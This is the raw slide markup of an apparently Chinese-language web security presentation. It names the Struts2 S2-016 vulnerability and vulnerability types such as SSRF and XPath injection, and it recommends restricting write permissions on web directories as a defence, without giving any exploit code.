                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>是否只能坐以待毙？拔掉网线，等待官方出补丁包？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>其实并不是，合理设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>目录权限是可以抵御这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞攻击的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3934204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369332"/>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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞案例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="923506"/>
            <a:ext cx="2012089" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>S2-016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞为例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="1404805"/>
            <a:ext cx="8647619" cy="1809524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="3326296"/>
            <a:ext cx="5514286" cy="2876190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2860084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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1653711" y="510144"/>
            <a:ext cx="8612943" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>软件漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>软件漏洞主要是操作系统和第三方软件在编码实现上存在问题，导致攻击者可以获取权限提升、远程执行任意代码等操作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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44843" y="2580031"/>
            <a:ext cx="5221973" cy="260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p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6440132" y="2103420"/>
            <a:ext cx="3276190" cy="4161905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230713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369332"/>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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞案例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="923506"/>
            <a:ext cx="2012089" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>目录权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289527" y="1007705"/>
            <a:ext cx="6308995" cy="4777441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229488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369332"/>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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞案例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636047" y="932837"/>
            <a:ext cx="4261103" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>目录权限，禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>写入：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5600438" y="702809"/>
            <a:ext cx="4591097" cy="5832880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="636047" y="1869935"/>
            <a:ext cx="8266667" cy="1923810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3829686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p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="202558"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>7</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4"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其他漏洞</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="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5" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="6"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7"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8" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="9"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10"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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362075" y="977421"/>
            <a:ext cx="10344149" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SSRF</a:t>
            </a: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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>XPATH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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smtClean="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ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>逻辑漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>接口安全（越权等）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>。。。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3132547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p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1731532" y="202558"/>
            <a:ext cx="6884754" cy="584777"/>
            <a:chOff x="207532" y="202557"/>
            <a:chExt cx="6884754" cy="584777"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394298" y="202557"/>
              <a:ext cx="758165" cy="584777"/>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3200" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>0</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="284360"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                  <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
                </a:rPr>
                <a:t>8</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="文本框 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1520546" y="264115"/>
              <a:ext cx="5571740" cy="461662"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="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rPr>
                <a:t>如何填坑</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="28436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5" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="6" name="直接连接符 27"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="207532" y="454200"/>
                <a:ext cx="213311" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25402" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="7" name="直接连接符 28"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="207532" y="535692"/>
                <a:ext cx="213311" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25402" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="9" name="直接连接符 22"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1123569" y="454200"/>
                <a:ext cx="213302" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25402" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
